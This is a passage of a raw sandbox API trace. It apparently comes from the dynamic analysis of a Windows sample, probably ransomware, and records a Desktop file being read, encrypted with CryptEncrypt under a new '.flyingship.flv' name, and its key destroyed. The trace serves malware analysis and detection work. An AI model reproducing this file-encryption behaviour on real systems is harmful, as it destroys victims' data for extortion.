lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0168.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0168.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0168.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0168.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.203] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flyingship.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\we2ef3.flyingship.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0168.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0168.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0168.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0168.205] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0168.205] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.205] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0168.205] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0168.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0168.205] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0168.206] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0168.206] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0168.210] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x659d, lpOverlapped=0x0) returned 1 [0168.210] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0168.211] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0168.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0168.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0168.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0168.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1659d) returned 0x9e5190 [0168.212] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0168.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0168.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0168.212] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0168.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0168.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.212] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0168.212] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0168.212] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0168.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0168.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0168.212] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0168.213] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0168.213] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0168.213] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0168.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0168.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0168.214] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0168.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0168.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0168.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0168.214] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.215] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0168.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0168.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.215] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0168.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0168.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0168.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.215] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c28c8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c28c8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0168.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0168.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0168.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0168.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0168.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0168.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0168.216] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0168.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0168.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0168.216] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0168.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0168.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0168.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0168.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0168.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0168.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0168.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0168.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0168.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0168.216] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0168.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.216] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.216] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0168.216] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.216] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0168.243] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.244] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.244] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x1659d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x165a0) returned 1 [0168.244] CharLowerBuffW (in: lpsz="byte[91553]", cchLength=0xb | out: lpsz="byte[91553]") returned 0xb [0168.245] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.245] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.245] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa28288*, pdwDataLen=0x87e820*=0x1659d, dwBufLen=0x165a0 | out: pbData=0xa28288*, pdwDataLen=0x87e820*=0x165a0) returned 1 [0168.245] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0168.246] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0168.246] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.257] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0168.258] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.258] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.258] CryptDestroyKey (hKey=0x90aed8) returned 1 [0168.258] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0168.258] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0168.258] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.258] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0168.258] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0168.258] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.258] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.258] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0168.258] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.258] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0168.258] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.259] FreeLibrary (hLibModule=0x74f20000) returned 1 [0168.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0168.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0168.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0168.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0168.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0168.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0168.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0168.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0168.259] CloseHandle (hObject=0x138) returned 1 [0168.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0168.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0168.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0168.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0168.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0168.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0168.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0168.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0168.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0168.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0168.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0168.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0168.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0168.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0168.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0168.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0168.261] CloseHandle (hObject=0x120) returned 1 [0168.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0168.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0168.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0168.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0168.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0168.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0168.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0168.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0168.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0168.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0168.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0168.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0168.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0168.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0168.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.265] 